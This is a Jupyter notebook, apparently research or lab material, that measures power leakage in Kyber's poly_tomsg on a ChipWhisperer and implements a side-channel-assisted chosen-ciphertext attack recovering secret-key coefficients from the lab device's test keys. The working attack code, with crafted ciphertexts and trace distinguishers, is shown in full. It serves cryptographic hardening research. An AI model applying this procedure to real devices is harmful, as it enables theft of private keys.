# Kyber $\texttt{poly}\_\texttt{tomsg}$ Side Channel Analysis 

This Notebook contains:
- ChipWhisperer setup for Kyber reference code
- Leakage Detection on the $\texttt{poly}\_\texttt{tomsg}$ function from `poly.c`
- Side Channel Assisted Chosen Ciphertext Attack based on the identified leakage
----- 

## Preliminaries

In [2]:
# Loading auxiliary functions
%run -i ../Common_functions/Additional_functions.py

In [3]:
# Loading auxiliary functions for ChipWhisperer communication
%run -i Chipwhisperer_functions.py

In [4]:
# Importing useful libraries
import matplotlib.pyplot as plt
from tqdm.notebook import trange
from scipy.stats import ttest_ind

In [5]:
# Setting default size of figures in Matplotlib
plt.rcParams["figure.figsize"] = (13, 3) 

# Set the maximum display width for NumPy arrays
np.set_printoptions(linewidth=100)

# Adjusting the display of tables
np.set_printoptions(threshold=10) 

In [6]:
# Matplotlib constants 
span_color = "#FFC069"
color1 = "gold"
color0 = "rebeccapurple"

--------
## Setup of the ChipWhisperer

In [7]:
# Base Scope for ChipWhisperer Lite 
SCOPETYPE = 'OPENADC'

# ChipWhisperer Lite used Cortex-M4 
PLATFORM = 'CWLITEARM'

# Project Targeted
CRYPTO_TARGET ='KYBER'

# SimpleSerial version used
SS_VER = 'SS_VER_1_1'

# Kyber K size, determines security level
KYBER_K = repr(K)

# If SHUFFLING = '0', the standard poly_tomsg is used; if SHUFFLING = '1', the shuffled poly_tomsg is used
SHUFFLING = f"{False:d}" 

In [8]:
# Detecting where is the ChipWhisperer setup notebook, if any
probable_path_to_chipwhisperer_setup_notebook = !find ~/chipwhisperer/jupyter/Setup_Scripts/ -name "Setup_Generic.ipynb"

print(f"Probable path to ChipWhisperer jupyter setup script:")
print(f">>> {probable_path_to_chipwhisperer_setup_notebook}")

Probable path to ChipWhisperer jupyter setup script:
>>> ['/home/kali/chipwhisperer/jupyter/Setup_Scripts/Setup_Generic.ipynb']


In [9]:
# # Change the path to match the location of your file Setup_Generic.ipynb
# path_to_chipwhisperer_setup_notebook = ...
path_to_chipwhisperer_setup_notebook = probable_path_to_chipwhisperer_setup_notebook[0]

In [10]:
%run $path_to_chipwhisperer_setup_notebook

USBErrorIO: LIBUSB_ERROR_IO [-1]

USBErrorIO: LIBUSB_ERROR_IO [-1]

In [ ]:
# Number of samples that the ChipWhisperer has to record per trace
scope.adc.samples = 24400

### Compiling the Kyber code being analyzed

In [ ]:
# Detecting where is the simpleserial location, if any
probable_path_to_simpleserial = !find ~ -name simpleserial-{CRYPTO_TARGET.lower()}

print(f"Probable path to communication protocol with the {CRYPTO_TARGET} code: ")
print(f">>> {probable_path_to_simpleserial}")

In [11]:
# # Change the path to match the location of the simpleserial code 
# path_to_simpleserial = ... 
path_to_simpleserial = probable_path_to_simpleserial[0]

NameError: name 'probable_path_to_simpleserial' is not defined

In [ ]:
%%bash -s "$path_to_simpleserial" "$PLATFORM" "$CRYPTO_TARGET" "$SS_VER" "$KYBER_K" "$SHUFFLING"
cd $1

printf "CLEANING PREVIOUS BUILD FILES:\n\n"
make -s clean PLATFORM=$2 CRYPTO_TARGET=$3 SS_VER=$4 
rm -f ../extra/*.o

printf "\nBUILDING PROJECT FILES:\n\n"
make PLATFORM=$2 CRYPTO_TARGET=$3 SS_VER=$4 K=$5 SHUFFLED=$6

### Loading the executable into the ChipWhisperer

In [ ]:
# Detecting where is the simpleserial executable location, if any
probable_path_to_executable = !find ~ -name simpleserial-{CRYPTO_TARGET.lower()}-{PLATFORM}.hex

print(f"Probable path to communication protocol with the {CRYPTO_TARGET} code: ")
print(f">>> {probable_path_to_executable}")

In [ ]:
# # Change the path to match the executable code 
# path_to_executable = ...
path_to_executable = probable_path_to_executable[0]

In [ ]:
cw.program_target(scope, prog, path_to_executable)

-----
## Leakage Detection

### Sending the secret key to the ChipWhisperer

In [13]:
# Read specified number of keys from the KAT file (from 1 to 100)
number_keys_to_read = 100 
keys_file_name = f'../Common_functions/PQCkemKAT_{KEM_SK_BYTES}.rsp'
PK_KEM, SK_KEM = read_keys_from_KAT(number_keys_to_read, keys_file_name = keys_file_name)

In [16]:
# Depending on the number of keys read (from 0 to number_keys_to_read - 1)
index_sk_targeted = np.random.randint(0, number_keys_to_read)
 
# Extracting the sk_KEM from the dictionnary of keys as an hex string
hex_sk_KEM = SK_KEM[index_sk_targeted]
 
# Extracting the sk_PKE from the sk_KEM as an hex string
hex_sk_PKE = hex_sk_KEM[:2*SK_BYTES]
 
# Converting the sk_PKE to polynomial vector representation
polyvec_sk_PKE = hex_sk_to_int_sk(hex_sk_PKE)

# Only for Chipwhisperer, serilizing the sk_PKE from the sk_KEM as chunks of hex string
serialized_hex_sk_PKE = serialize_sk(hex_sk_PKE)

print(f"sk trageted #{index_sk_targeted}: {polyvec_sk_PKE}")

sk trageted #10: [[-1, -1, 0, 1, -1, 1, 0, 0, 0, 0, 0, -1, -1, 1, 1, 0, 0, -1, 0, 0, -1, -1, 1, 0, 1, 2, -1, 0, 0, 2, 1, 0, 1, 1, 0, 0, 1, 0, -2, -2, 2, 1, 0, 0, 0, 0, 1, -2, 1, -1, -1, 1, 0, -1, 1, -1, 0, 0, 0, -1, -2, 0, -1, 0, -1, 0, 0, -1, 0, 2, 0, 0, -1, -2, -1, -1, -1, -1, 0, 0, 0, -2, -1, -2, 1, 0, 0, 1, 0, -1, 1, 1, -1, 0, -1, 0, 0, -2, -2, 1, -1, 0, 0, 1, 2, 2, 0, 1, -2, -1, 0, 1, 0, 1, 0, 1, -1, -1, -1, 0, -1, -1, 0, 1, -1, 1, 0, 0, 1, -2, -2, -1, 1, 0, 2, 0, 1, 0, -1, 1, 0, 0, -1, -1, 2, 1, 2, 2, 1, -1, -2, -1, 1, 1, -1, 2, 1, 0, -1, 0, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 1, 0, 1, 1, 1, -1, 1, -1, 1, -1, -1, -1, 1, 0, -2, 0, -2, 0, 0, 2, -1, 0, 0, -1, 0, 1, 2, 0, 0, 1, 0, 0, 1, 2, -1, 1, 1, 1, 0, 0, -1, -1, -1, 1, 1, 0, -1, 1, 0, 2, 0, -1, -2, -1, -1, 0, -2, 0, -1, 1, 1, 1, 1, 1, 1, 0, 2, 0, -1, 0, -1, 2, -1, -1, 0, 0, 0, 0, -1, 1, 1, 0, 0, 1, -2, 0], [1, -1, 0, 1, 0, -1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 2, 0, -1, 0, 0, 0, 1, 0, 1, 0, 0, 2, 0, 1, 0, 0, -1, 1, 1, 0, 1, 0, 1, 0, 0, 0

In [ ]:
# Load the secret key in the ChipWhisperer
print("Sending sk:", end = " ")
send_sk(serialized_hex_sk_PKE, reset = True)
print(u"\u2705")

In [ ]:
# Just to check that communication succeeded 
hex_sk_PKE_output = get_full_sk_hex_str()

if hex_sk_PKE_output.upper() == hex_sk_PKE:
    print("sk correctly written to the Chipwhisperer")
else:
    print("Problem with the sk written in the Chipwhisperer")

### Setting malicious $\textbf{u}$ and $v$

In [18]:
v_coeffs_rounded0 = [-416%Q]
print(f"Reference malicious v for coeff rounded to 0: {int(math.remainder(v_coeffs_rounded0[0], Q))}")

# # If there is not enough leakage you can use this strategy
# v_coeffs_rounded0 = [decompress(value, d = DV) for value in range(15, 12, -1)]
# print(f"Reference malicious v for coeff rounded to 0: {[int(math.remainder(v_coeffs_rounded0[i], Q)) for i in range(len(v_coeffs_rounded0))]}")

Reference malicious v for coeff rounded to 0: -416


In [21]:
v_coeffs_rounded1 = [-1248%Q]
print(f"Reference malicious v for coeff rounded to 1: {int(math.remainder(v_coeffs_rounded1[0], Q))}")

# # If there is not enough leakage you can use this strategy
# v_coeffs_rounded1 = [decompress(value, d = DV) for value in range(11, 8, -1)]
# print(f"Reference malicious v for coeff rounded to 0: {[int(math.remainder(v_coeffs_rounded1[i], Q)) for i in range(len(v_coeffs_rounded1))]}")

Reference malicious v for coeff rounded to 1: -1248


In [22]:
max_decompress_u_value = 42
# # If there is not enough leakage you can use this strategy (only with alternative v strategy)
# max_decompress_u_value = 21

print(f"Kyber{K*N} (minimal, maximal) secret value: ({-ETA1: 2d}, {ETA1: 2d})")
print(f"Maximal malicious u: decompress({max_decompress_u_value}, d = {DU}) = {decompress(max_decompress_u_value, d= DU)}")

print("  For coeffs rounded to 0:")
print(f"    {-(Q-1)//4} <= {int(math.remainder(v_coeffs_rounded0[0], Q))} - {ETA1} x {decompress(max_decompress_u_value, d= DU)} <= {0} ")
print(f"    {-(Q-1)//4} <= {int(math.remainder(v_coeffs_rounded0[0], Q))} + {ETA1} x {decompress(max_decompress_u_value, d= DU)} <= {0} ")
 
print("  For coeffs rounded to 1:")
print(f"    {-(Q-1)//2} <= {int(math.remainder(v_coeffs_rounded1[0], Q))} - {ETA1} x {decompress(max_decompress_u_value, d= DU)} < {-(Q-1)//4} ")
print(f"    {-(Q-1)//2} <= {int(math.remainder(v_coeffs_rounded1[0], Q))} + {ETA1} x {decompress(max_decompress_u_value, d= DU)} < {-(Q-1)//4} ")

Kyber1024 (minimal, maximal) secret value: (-2,  2)
Maximal malicious u: decompress(42, d = 11) = 68
  For coeffs rounded to 0:
    -832 <= -416 - 2 x 68 <= 0 
    -832 <= -416 + 2 x 68 <= 0 
  For coeffs rounded to 1:
    -1664 <= -1248 - 2 x 68 < -832 
    -1664 <= -1248 + 2 x 68 < -832 


### Capturing traces during the decryption

In [ ]:
# Building the reference means for coeff rounded to 0
dataset_building_rounded0 = []

In [ ]:
# Initializing u to zero
polyvec_u = [[0 for _ in range(N)] for i in range(K)]

for v_coeffs_rounded0_index in trange(0, len(v_coeffs_rounded0), desc = "Capturing v"):
    # Setting malicious v
    poly_v = [v_coeffs_rounded0[v_coeffs_rounded0_index]  for _ in range(N)]
    
    for u_value in trange(0, max_decompress_u_value, desc = "Capturing u"):
        # Setting malicious u, only for first polynomial here 
        polyvec_u[0][0] = decompress(u_value, d = DU)

        # Sending ciphertext to Chipwhisperer and performing decryption 
        ## If you want to check that communication succeeded, make sure read = True: 
        msg_bytes, trace = kyber_decrypt(polyvec_u, poly_v, read = False, capture = True)
        
        # Store complete trace for later use
        dataset_building_rounded0.append(trace)
        
        ## If you want to check that communication succeeded, uncomment the following: 
        # hex_c_output = get_full_c_hex_str()
        # polyvec_u_output, poly_v_output = hex_c_to_int_c1_c2(hex_c_output)
        # assert polyvec_u_output == polyvec_u
        # assert    poly_v_output ==    poly_v 

In [ ]:
# Building the reference means for coeff rounded to 1
dataset_building_rounded1 = []

In [ ]:
# Initializing u to zero
polyvec_u = [[0 for _ in range(N)] for i in range(K)]

for v_coeffs_rounded1_index in trange(0, len(v_coeffs_rounded1), desc = "Capturing v"):
    # Setting malicious v
    poly_v = [v_coeffs_rounded1[v_coeffs_rounded1_index]  for _ in range(N)]
    
    for u_value in trange(0, max_decompress_u_value, desc = "Capturing u"):
        # Setting malicious u 
        polyvec_u[0][0] = decompress(u_value, d = DU)

        # Sending ciphertext to Chipwhisperer and performing decryption 
        ## If you want to check that communication succeeded, make sure read = True: 
        msg_bytes, trace = kyber_decrypt(polyvec_u, poly_v, read = False, capture = True)
        
        # Store complete trace for later use
        dataset_building_rounded1.append(trace)
        
        ## If you want to check that communication succeeded, uncomment the following: 
        # hex_c_output = get_full_c_hex_str()
        # polyvec_u_output, poly_v_output = hex_c_to_int_c1_c2(hex_c_output)
        # assert polyvec_u_output == polyvec_u
        # assert    poly_v_output ==    poly_v 

In [ ]:
# Visualizing 10 traces from each dataset
plt.plot(np.transpose(dataset_building_rounded0[0:10]))
plt.xlim(0,1400)
plt.title("Traces from negative coefficient rounded to 0",y=-0.4)
plt.show()

plt.plot(np.transpose(dataset_building_rounded1[0:10]))
plt.xlim(0,1400)
plt.title("Traces from negative coefficient rounded to 1",y=-0.4)
plt.show()

### T-test between the two datasets 

As a first indicator, let's visualize the t-test between our two datasets

In [ ]:
t_value = ttest_ind(dataset_building_rounded0, dataset_building_rounded1, axis = 0, equal_var = False)[0]

In [ ]:
fg, ax = plt.subplots(figsize = (13, 3))

# Visualizing 10 traces from each dataset
ax.plot(np.transpose(dataset_building_rounded1[:10]), color = color1, alpha=0.4)
ax.plot(np.transpose(dataset_building_rounded0[:10]), color = color0, alpha=0.4)

ax2 = ax.twinx()
ax2.plot(t_value, color = "tomato", alpha = 1)
ax.set_xlabel("samples")
ax.set_ylabel("power")
ax2.set_ylabel("t-value")

# Significance threshold
plt.axhspan(-4.5, 4.5, color = "C2", alpha = 0.25)
            
plt.xlim(0, 1050)

plt.show()

### Determining repeating patterns 

> ⚠️ This is a **quick** and **dirty** method only destined to be used for the sake of this attack  

Here, we will try to automatically detect the patterns corresponding to the compressing of each coefficient

In [ ]:
# We retrieve the number of samples/cycles ratio of the CW (by default this should be 4)
cw_sample_cycle_ratio =  int(scope.clock.adc_src[-1])
 
# Making an educated guess on how many samples at the beginning of the trace correspond to the trigger
cw_trigger_offset     = 6*cw_sample_cycle_ratio

Let's analyze the C code from [github.com/pq-crystals/kyber/](https://github.com/pq-crystals/kyber/blob/main/ref/poly.c):

```c
void poly_tomsg(uint8_t msg[KYBER_INDCPA_MSGBYTES], const poly *a){
  unsigned int i,j;
  uint32_t t;
  uint32_t  mask;
  for(i=0;i<KYBER_N/8;i++) {
    msg[i] = 0;
    for(j=0;j<8;j++) {
      t  = a->coeffs[8*i+j];
      // t += ((int16_t)t >> 15) & KYBER_Q;
      // t  = (((t << 1) + KYBER_Q/2)/KYBER_Q) & 1;
      t <<= 1;
      t += 1665;
      t *= 80635;
      t >>= 28;
      t &= 1;
      msg[i] |= t << j;   

    }
  }
}
```

In [ ]:
# We have 7 lines for the compression of one coefficient (code block inside the second `for` loop). 
nb_c_lines = 7

# Let's guess that we will have at least cw_sample_cycle_ratio x 7 samples, for the operation we target 
min_samples_compress = cw_sample_cycle_ratio * nb_c_lines

# As a maximum let's guess that this can result in 2 cycles per C line
max_samples_compress = 2 * min_samples_compress

To start, we will focus on one full iteration of the second `for` loop  
We can see that we will have 8 succesive compress somewhere in the beginning of the trace  
So in the first samples of one trace we should have:
* a few samples related to the chipwhisperer trigger process
* some more few samples for the start of `for` loops
* 8 patterns corresponding to the compress
* some extra samples between the patterns for the logic behind the `for` loops  

In [ ]:
# The number of coefficient for the whole second for loop
nb_coeffs                   = 8

# An educated guess on how much samples are taken at the beginning of the poly_tomsg for loops
start_function_offset       = 6 * cw_sample_cycle_ratio

# Another educated guess on how much other operations are accounted for in the trace
other_operations_samples    = 4 * cw_sample_cycle_ratio

# Combining everything we have the approximate duration of the second for loop
approximate_len_1for_j_loop =  cw_trigger_offset + start_function_offset\
                              + nb_coeffs * max_samples_compress\
                              + other_operations_samples 

Now that we have determined this smaller window, we can restrict our dataset to the part that we are analyzing

In [ ]:
data = np.mean(dataset_building_rounded0, axis = 0)[:approximate_len_1for_j_loop]

# Visualize the data with the identified operations 
plt.plot(data, color = color0)
plt.axvspan(0, cw_trigger_offset, color = "tan", alpha = 0.2)
y_pos = np.min(data) + 0.01

plt.axvspan(cw_trigger_offset, cw_trigger_offset + start_function_offset, color = "sandybrown", alpha = 0.2)
x_pos = (cw_trigger_offset + start_function_offset + cw_trigger_offset)/2
plt.text(x_pos, y_pos, 'start\nfor loop', horizontalalignment='center', verticalalignment='center', fontsize=9)

plt.axvspan(cw_trigger_offset + start_function_offset, cw_trigger_offset + start_function_offset + nb_coeffs * max_samples_compress + other_operations_samples, color = "green", alpha = 0.2)
x_pos = (cw_trigger_offset + start_function_offset + nb_coeffs * max_samples_compress + other_operations_samples + cw_trigger_offset)/2
plt.text(x_pos, y_pos, f'poly_tomsg {nb_coeffs} first coefficients', horizontalalignment='center', verticalalignment='center', fontsize=9)

plt.show()

After checking that everything looks good, we are ready to detect some patterns 

In [ ]:
# The minimal correlation tolerated between patterns
limit = 0.99

# The number of patterns tolerated with a correlation inferior to limit
nb_not_good = 0

In [ ]:
%%time
cpt_good_candidates = 0

GOOD_CANDIDATES = []

# Brute-forcing through all the starting points 
for start_point in range(cw_trigger_offset + start_function_offset, cw_trigger_offset + start_function_offset + cw_sample_cycle_ratio*4):
    # Iterating through all the possible pattern lengths, starting from the largest
    for length in range(max_samples_compress, min_samples_compress-1, -1):
        # Maximum spacing between patterns so that we don't go outside the trace
        max_spacing = (len(data) - start_point - nb_coeffs*length-1)//(nb_coeffs-1)
        
        # Iterating through all the possible spacing lengths, starting from the largest
        for spacing in range(max_spacing, -1, -1):
            potential_windows, window_start_index, window_end_index = [], [], []
            
            # Compute the first pattern, start point of window, end point of window and samples
            new_window_start = start_point
            window_start_index.append(new_window_start)

            new_window_end   = new_window_start + length
            window_end_index.append(new_window_end + 1)

            potential_windows.append(data[new_window_start : new_window_end + 1])
            
            # Compute the other patterns based on the first one 
            for window_index in range(1, nb_coeffs):
                new_window_start = new_window_end + spacing
                window_start_index.append(new_window_start)

                new_window_end   = new_window_start + length
                window_end_index.append(new_window_end + 1)

                potential_windows.append(data[new_window_start : new_window_end + 1])
            
            # Quality of matching patterns
            measure = np.corrcoef(potential_windows)

            if np.count_nonzero(measure <= limit) <= nb_not_good:
                cpt_good_candidates += 1
                GOOD_CANDIDATES.append([window_start_index, window_end_index, potential_windows])

print(f">>> You have found {len(GOOD_CANDIDATES)} good matching patterns candidates", end = "\n\n")

In [ ]:
# Visualizing all the good candidates previously found (can take a few seconds)
for windows_index, element in enumerate(GOOD_CANDIDATES):
    print(f">>> Window #{windows_index}")
    window_start_index, window_end_index, potential_windows = element
    
    fig, ax = plt.subplots(figsize = (13, 3))
    ax.plot(data, color = color0, alpha = 1)
    for window_index in range(0, len(potential_windows)):
        plt.plot(range(window_start_index[window_index], window_end_index[window_index]), potential_windows[window_index], color = f"C{window_index+1}")
        plt.axvspan(window_start_index[window_index], window_end_index[window_index], color = f"C{window_index+1}", alpha = 0.25)
    ax.set_xlabel("samples")
    ax.set_ylabel("power")
    
    ax2 = ax.twinx()
    ax2.plot(t_value[:approximate_len_1for_j_loop],color="red", alpha=1)
    ax2.set_ylabel("t-value")
    plt.show()

In [ ]:
# Select one candidate that looks good (by default the first one)
index_chosen =  0

# global compress_index_start, compress_index_end
compress_index_start, compress_index_end, potential_windows = GOOD_CANDIDATES[index_chosen]

In [ ]:
# Based of this candidate set of patterns we can determine some constants 
# Start of the first poly_tomsg
start_index_compress_coeff0 = compress_index_start[0]

# Length of the first poly_tomsg
approximate_length_compress_coeff = compress_index_end[0] - compress_index_start[0]

# Distance between two for j loops
distance_forj_loop_forj_loop = compress_index_start[1] - compress_index_end[0]

In [ ]:
plt.plot(data, color = color0)

# Visualize the data with the identified operations 
plt.axvspan(0, cw_trigger_offset, color = "tan", alpha = 0.2)
y_pos = np.min(data) + 0.01
x_pos = (cw_trigger_offset + 0)/2
plt.text(x_pos,y_pos, 'cw\ntrigger', horizontalalignment='center', verticalalignment='center', fontsize=9)

plt.axvspan(cw_trigger_offset, cw_trigger_offset + start_function_offset, color = "sandybrown", alpha = 0.2)
x_pos = (cw_trigger_offset + start_function_offset + cw_trigger_offset)/2
plt.text(x_pos, y_pos, 'start\nfor loop', horizontalalignment='center', verticalalignment='center', fontsize=9)

for compress_index in range(0, nb_coeffs):
    start_window, end_window = compress_index_start[compress_index], compress_index_end[compress_index]
    plt.axvspan(start_window, end_window, color = f"C{compress_index+1}", alpha = 0.25)
    x_pos = (end_window + start_window)/2
    plt.text(x_pos, y_pos, f'poly_tomsg\ncoeff {compress_index}', horizontalalignment='center', verticalalignment='center', fontsize=9)

plt.show()

The 8 patterns identified should hopefully correspond to the compression of the 8 first coefficients  

We can use them to identify the rest  

In [ ]:
# One more educated guess on how much other operations are accounted for on the trace 
other_operations_samples    = 16 * cw_sample_cycle_ratio

# Combining everything we have the approximate length of another iterationn of the second for loop
approximate_len_2for_j_loop =  cw_trigger_offset + start_function_offset\
                             + 2*(compress_index_end[-1]- compress_index_start[0])\
                             + other_operations_samples

In [ ]:
data = np.mean(dataset_building_rounded0, axis = 0)[:approximate_len_2for_j_loop]

# Visualize the data with the identified operations 
plt.plot(data, color = color0)
plt.axvspan(0, cw_trigger_offset, color = "tan", alpha = 0.2)
y_pos = np.min(data) + 0.01
x_pos = (cw_trigger_offset + 0)/2
plt.text(x_pos,y_pos, 'cw\ntrigger', horizontalalignment='center', verticalalignment='center', fontsize=7)

plt.axvspan(cw_trigger_offset, cw_trigger_offset + start_function_offset, color = "sandybrown", alpha = 0.2)
x_pos = (cw_trigger_offset + start_function_offset + cw_trigger_offset)/2
plt.text(x_pos, y_pos, 'start\nfor loop', horizontalalignment='center', verticalalignment='center', fontsize=7)

plt.axvline(compress_index_start[0], color ="red")
plt.axvline(compress_index_end[-1], color ="red")

x_pos = (compress_index_end[-1]+compress_index_start[0])/2
plt.text(x_pos, y_pos, f'poly_tomsg {nb_coeffs} first coefficients', horizontalalignment='center', fontsize=7)

for compress_index in range(0, nb_coeffs):
    start_window, end_window = compress_index_start[compress_index], compress_index_end[compress_index]
    plt.axvspan(start_window, end_window, color = f"C{compress_index+1}", alpha = 0.25)

plt.axvspan(compress_index_end[-1], approximate_len_2for_j_loop, color = "green", alpha = 0.2)
x_pos = (compress_index_end[-1] + approximate_len_2for_j_loop)/2
plt.text(x_pos, y_pos, f'poly_tomsg {nb_coeffs} next coefficients', horizontalalignment='center', verticalalignment='center', fontsize=9)

plt.show()

In [ ]:
%%time
# Choose one coefficient as a reference to detect the next batch (default 0)
coeffref = 0
start_window, end_window = compress_index_start[coeffref], compress_index_end[coeffref]
window_compress_coeffref = data[start_window : end_window]

for start_point in range(compress_index_end[-1], approximate_len_2for_j_loop - approximate_length_compress_coeff):
    potential_window_compress_coeff = data[start_point : start_point + approximate_length_compress_coeff]
    measure = np.corrcoef(window_compress_coeffref, potential_window_compress_coeff)
    if measure[0][1] >= limit:
        potential_distance_fori_loop_forj_loop  = start_point - compress_index_end[-1]
        print(f"Good window found ({start_point}, {start_point + len(window_compress_coeffref)}) with quality {measure[0][1]}")
        break

In [ ]:
# Distance between the for i and for j loops
distance_fori_loop_forj_loop = potential_distance_fori_loop_forj_loop

Automate the computation of window given the index

In [ ]:
def get_compress_index_window(compress_index):
    start_compress_index =  start_index_compress_coeff0\
                          + compress_index*approximate_length_compress_coeff\
                          + (compress_index//nb_coeffs)*(nb_coeffs-1)*distance_forj_loop_forj_loop\
                          + (compress_index%nb_coeffs)*distance_forj_loop_forj_loop\
                          + (compress_index//nb_coeffs)*distance_fori_loop_forj_loop
    end_compress_index   = start_compress_index + approximate_length_compress_coeff
    return start_compress_index, end_compress_index
    

In [ ]:
plt.plot(data, color = color0)
plt.axvspan(0, cw_trigger_offset, color = "tan", alpha = 0.2)
y_pos = np.min(data) + 0.01
x_pos = (cw_trigger_offset + 0)/2
plt.text(x_pos,y_pos, 'cw\ntrigger', horizontalalignment='center', verticalalignment='center', fontsize=7)

plt.axvspan(cw_trigger_offset, cw_trigger_offset + start_function_offset, color = "sandybrown", alpha = 0.2)
x_pos = (cw_trigger_offset + start_function_offset + cw_trigger_offset)/2
plt.text(x_pos, y_pos, 'start\nfor loop', horizontalalignment='center', verticalalignment='center', fontsize=7)

plt.axvline(compress_index_start[0], color ="red")
plt.axvline(compress_index_end[-1], color ="red")
x_pos = (compress_index_end[-1]+compress_index_start[0])/2
plt.text(x_pos, y_pos, f'poly_tomsg {nb_coeffs} first coefficients', horizontalalignment='center', fontsize=9)

for compress_index in range(0, nb_coeffs):
    start_window, end_window = get_compress_index_window(compress_index)
    plt.axvspan(start_window, end_window, color = f"C{compress_index+1}", alpha = 0.25)

for compress_index in range(nb_coeffs, 2*nb_coeffs):
    start_window, end_window = get_compress_index_window(compress_index)
    plt.axvspan(start_window, end_window, color = f"C{compress_index%8+1}", alpha = 0.25)

x_pos = (get_compress_index_window(nb_coeffs)[0]  + get_compress_index_window(2*nb_coeffs-1)[0])/2
plt.text(x_pos, y_pos, f'poly_tomsg {nb_coeffs} next coefficients', horizontalalignment='center', verticalalignment='center', fontsize=9)

plt.show()

-----
## Attack

### Building reference means

We will use leakage from the $N$ coefficients to build reference means for values for which:  
- The value after applying $\texttt{compress}$ is equal to $0$
- The value after applying $\texttt{compress}$ is equal to $1$


In [ ]:
# For each trace in the dataset, we iterate through the N coeffs to get the window where each coeff is compressed
# Then, we compute the mean trace for the negative coeff rounded to 0 after the compress on the first 256 coeffs
traces_mean_rounded0 = []
for trace in dataset_building_rounded0:
    for compress_index in range(0, N):
        start_window, end_window = get_compress_index_window(compress_index)
        traces_mean_rounded0.append(trace[start_window: end_window + 1])
        
mean_rounded0 = np.mean(traces_mean_rounded0,axis=0)

In [ ]:
# For each trace in the dataset, we iterate through the N coeffs to get the window where each coefficient is compressed
# Then, we compute the mean trace for the negative coeff rounded to 1 after the compress on the first 256 coeffs
traces_mean_rounded1 = []
for trace in dataset_building_rounded1:
    for compress_index in range(0, N):
        start_window, end_window = get_compress_index_window(compress_index)
        traces_mean_rounded1.append(trace[start_window: end_window + 1])
        
mean_rounded1 = np.mean(traces_mean_rounded1,axis=0)

In [ ]:
# Plotting to visualize the difference between mean_rouded0 and mean_rounded1
plt.plot(mean_rounded0, color = color0, label='mean_rounded0')
plt.plot(mean_rounded1, color = color1, label='mean_rounded1')

plt.title("Means of each datasets",y=-0.3)

plt.legend()
plt.show()

After displaying all the 256 traces, we can see that only the samples between 9 and 10 exhibit strong leakage in our case. We will focus on those.
 
⚠️  It’s possible that the leakage shifts depending on the pattern matching obtained. Adjust it to the window where you observe the most leakage.

In [ ]:
reduced_start = 9
reduced_len   = 2
reduced_end   = reduced_start + reduced_len

In [ ]:
# Displaying the selected reduced window on all traces
trace = dataset_building_rounded0[0]
for compress_index in range(0, N):
    start_window, end_window = get_compress_index_window(compress_index)
    test = trace[start_window: end_window + 1]
    if compress_index == 0:
        plt.plot(test, color = color0, label = 'mean_rounded0')
    else:
        plt.plot(test, color = color0)
    
trace = dataset_building_rounded1[0]
for compress_index in range(0, N):
    start_window, end_window = get_compress_index_window(compress_index)
    test = trace[start_window: end_window + 1]
    if compress_index == 0:
        plt.plot(test, color = color1, label = 'mean_rounded1')
    else:
        plt.plot(test, color = color1)

plt.legend()
plt.axvspan(reduced_start, reduced_end, color = "green", alpha = 0.2)
plt.xlim(reduced_start-5, reduced_end+5)
plt.show()

In [ ]:
reduced_mean_rounded0 = mean_rounded0[reduced_start:reduced_end + 1]
reduced_mean_rounded1 = mean_rounded1[reduced_start:reduced_end + 1]

In [ ]:
# We redefine the function that computes the window on the restricted samples
def get_compress_index_window_reduced(compress_index):
    start_compress_index =  start_index_compress_coeff0\
                          + compress_index*approximate_length_compress_coeff\
                          + (compress_index//nb_coeffs)*(nb_coeffs-1)*distance_forj_loop_forj_loop\
                          + (compress_index%nb_coeffs)*distance_forj_loop_forj_loop\
                          + (compress_index//nb_coeffs)*distance_fori_loop_forj_loop
    start_compress_index = start_compress_index + reduced_start
    end_compress_index   = start_compress_index + reduced_len
    return start_compress_index, end_compress_index
    

### Parallel Chosen Ciphertext Attack assisted with Side-channel 

Refer to the paper for the choice of the malicious $\mathbf{u}$ and $v$


In [ ]:
malicious_v_coeff = -(Q - 1)//4
malicious_u_coeff =  (Q - 1)//16

We visualize the range of possible values for the secret coefficient based on the result of the compression given by the side-channel traces
![test](graphe.PNG)

In [ ]:
def get_malicious_v(previous_v, previous_rounding, stage):
    """
    Allows to get the new malicious v for the current stage, based
    on the previous malicious v and the result of the rounding 
    
    Inputs:
    --------
    previous_v        (int): previous stage malicious v
    previous_rounding (int): previous rounding (0 or 1)
    stage             (int): stage of the attack
    
    Outputs:
    --------
      (int): corresponding malicious v for this stage 
    """
    return previous_v - pow(-1, previous_rounding)*(416//(stage))

### Attack execution

In [ ]:
# Graph transformed into dictionary
secret_path_dict = {repr([0])      : [-3, -2, -1, 0],
                    repr([1])      : [1, 2, 3],
                    repr([0, 0])   : [-3, -2],
                    repr([0, 1])   : [-1, 0],
                    repr([1, 0])   : [1, 2],
                    repr([1, 1])   : [3],
                    repr([0, 0, 0]): [-3],
                    repr([0, 0, 1]): [-2],
                    repr([0, 1, 0]): [-1],
                    repr([0, 1, 1]): [0],
                    repr([1, 0, 0]): [1],
                    repr([1, 0, 1]): [2],
                    repr([1, 1, 0]): [3],
                    repr([1, 1, 1]): [4]}

In [ ]:
# Initializing the secret key, the actual value will be computed later
found_polyvec_sk_PKE = [[None for coeff_ in range(N)] for poly_ in range(K)]

In [ ]:
%%time

# Keeps in memory the binary path for the secret key in the dictionnary 
MATCH = [[[] for coeff_ in range(N)] for poly_ in range(K)]
ATK_TRACES = [[] for _ in range(K)]

for poly_targeted in trange(K, desc = f"Recovering poly of s"):
    polyvec_u = [[0 for coeff_ in range(N)] for poly_ in range(K)]
    polyvec_u[poly_targeted][0] = malicious_u_coeff

    for guess_stage in trange(3, desc = "Sending queries to decrypt"):    
        if guess_stage == 0:
            poly_v = [malicious_v_coeff for _ in range(256)]  
        else:
            for coeff_index in range(N):
                poly_v[coeff_index] = get_malicious_v(poly_v[coeff_index], MATCH[poly_targeted][coeff_index][-1], guess_stage)
                
        msg_bytes, trace = kyber_decrypt(polyvec_u, poly_v, capture = True)    
        
        ATK_TRACES[poly_targeted].append(trace)
        
        for coeff_index in range(N):
            start_compress_coeff, end_compress_coeff = get_compress_index_window_reduced(coeff_index)
            # Each trace is used to distinguish between coeffs rounded to 0 and coeffs rounded to 1
            trace_compress_coeff = trace[start_compress_coeff:end_compress_coeff + 1]

            # We choose the euclidian distance as a distinguisher to determine whether the trace chosen belongs to the 
            # set of traces rounded to 0 or the set of traces rounded to 1
            norm_rounded0 = np.linalg.norm(reduced_mean_rounded0 - trace_compress_coeff)
            norm_rounded1 = np.linalg.norm(reduced_mean_rounded1 - trace_compress_coeff)

